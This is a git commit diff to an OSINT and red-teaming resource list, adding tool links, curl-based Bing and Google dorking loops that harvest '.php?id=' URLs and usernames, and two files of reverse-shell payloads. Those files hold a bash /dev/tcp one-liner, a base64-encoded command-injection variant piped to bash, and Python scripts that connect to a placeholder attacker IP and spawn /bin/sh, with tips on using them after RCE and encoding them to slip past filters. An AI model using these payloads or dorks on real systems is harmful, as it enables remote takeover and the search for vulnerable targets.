Added new path and resouces

This commit is contained in:
Jieyab89
2024-12-05 00:14:22 +07:00
parent e7e1f32e80
commit 834e9698f4
5 changed files with 103 additions and 1 deletions

View File

@@ -1032,6 +1032,9 @@ Example
- [kendoemailapp](https://kendoemailapp.com/)
- [sgpbusiness](https://www.sgpbusiness.com/)
- [CrossLinked](https://github.com/m8sec/CrossLinked)
- [resourcecontracts](https://www.resourcecontracts.org/)
- [sayari](https://sayari.com/)
- [lexisnexis](https://www.lexisnexis.com/en-us)
# People Searching
@@ -3229,7 +3232,7 @@ NOOA Incident MAP
- [Railway zugfinder](https://www.zugfinder.net/)
- [KAI ID ROUTE](https://commuterline.id/perjalanan-krl/peta-rute)
# GPT OSINT
# GPT OSINT (AI)
- [Gpt osint](https://github.com/gigz/gpt-osint)
- [Hacker AI](https://chat.hackerai.co/id/login)
@@ -3237,6 +3240,7 @@ NOOA Incident MAP
- [Chat GPT](https://openai.com/chatgpt/)
- [poe AI](https://poe.com/login)
- [Chat-PDF](https://www.chatpdf.com/)
- [perplexity](https://www.perplexity.ai/)
# OSINT for Red Team
@@ -3366,6 +3370,7 @@ Noxer is a powerful Python script designed for automating Android penetration te
- [httptoolkit](https://httptoolkit.com/) Intercept, view & edit any HTTP traffic
- [LSPosed](https://github.com/LSPosed/LSPosed) Android framework module best of mobile pentesting
- [kernelsu](https://kernelsu.org/id_ID/) Rooted your android device
- [IOS Version Jailbreak Chart](https://docs.google.com/spreadsheets/d/1QjWyoDfaiF-TWhzVdvEMRqA3OQXsz6e8of3SxZB1W_M/edit?gid=128016025#gid=128016025)
Social Engineering
@@ -3377,6 +3382,7 @@ Social Engineering
Active Directory
- [Active Directory and Red Teaming attack vectors](https://github.com/zulfi0/RedTeaming_CheatSheet)
- [BloodHound](https://github.com/BloodHoundAD/BloodHound)
- [Certify](https://github.com/GhostPack/Certify)
- [Certipy](https://github.com/ly4k/Certipy)

View File

@@ -0,0 +1,37 @@
PRO TIPS!
You can add other headers, regex and search engine endpoints for refinement and to encode queries
- BING SEARCH
WEB
```WEB
for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.bing.com/search?pglt=2081&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done
```
Hunt Username
```USERNAME
for ((i=1;1<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0;Accept: */*;Accept-Language: id,en-US;q-0.7,en;q-0.3;Accept-Encoding: gzip, deflate, br;Referer: https: //www.bing.com/;DNT: 1;Connection: keep-alive;Cookie: 1P_JAR=2023-11-05-19;Sec-Fetch-Dest:empty;Sec-Fetch-Mode:cors;Sec-Fetch-Site: same-origin;TE: trailers" "https://www.bing.com/search?pglt=2081&q=Jieyab89" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep -E "Jieyab89|github" | sort -u ;done
```
Hunt Username
```USERNAME
for ((i=1;1<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0;Accept: */*;Accept-Language: id,en-US;q-0.7,en;q-0.3;Accept-Encoding: gzip, deflate, br;Referer: https: //www.bing.com/;DNT: 1;Connection: keep-alive;Cookie: 1P_JAR=2023-11-05-19;Sec-Fetch-Dest:empty;Sec-Fetch-Mode:cors;Sec-Fetch-Site: same-origin;TE: trailers" "Your Bing Request URL Header" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep -E "Jieyab89|github" | sort -u ;done
```
- GOOGLE SEARCH
Hunt Username
```USERNAME
for ((i=1;1<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0;Accept: */*;Accept-Language: id,en-US;q-0.7,en;q-0.3;Accept-Encoding: gzip, deflate, br;Referer: https: //www.google.com/;DNT: 1;Connection: keep-alive;Cookie: 1P_JAR=2023-11-05-19;Sec-Fetch-Dest:empty;Sec-Fetch-Mode:cors;Sec-Fetch-Site: same-origin;TE: trailers" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=Jieyab89" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep -E "Jieyab89|github" | sort -u ;done
```
WEB
```WEB
for ((i=1;i<=10;i++));do curl -i -s -k -L -X GET -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" "https://www.google.com/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&start=${i}0&q=.php?id=" | grep -Eo 'href="[^\"]+"' | grep -Po "(http|https)://[a-zA-Z0-9./?=_%:-]*" | grep ".php?id" | sort -u ;done
```

View File

@@ -0,0 +1,20 @@
# TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it 3.
4. Encode your script using url encode
## Script 1
```
sh -i >& /dev/tcp/<YOUR HOST OR IP>/<PORT> 0>&1
```
## Script 2
```
; echo c2ggLWkgPiYgL2Rldi90Y3AvPFlPVVIgSE9TVCBPUiBJUD4vPFBPUlQ+IDA+JjE= | base64 -d | bash;"
```

View File

@@ -0,0 +1,36 @@
# TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
1. Make sure the target has internet access (internet access opened)
2. Try changing the port to a larger one such as 8080, 8888, etc.
3. Encode your script using base64 and then decode it 3.
4. Encode your script using url encode
## Script 1
```
socket=_import("socket");os=import("os");pty=import_("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR IP>",<PORT LISTENER>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
```
## Script 2
```
import socket
import subprocess
import os
def back_connect(host, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])
host = "<YOUR IP>"
port = <YOUR LISTENER PORT>
back_connect(host, port)
```

View File

@@ -0,0 +1,3 @@
# Red Teaming
Welcome to path red teaming or pentesting for OSINT, on this path there are script and about tips about for enumeration, OSINT and other tips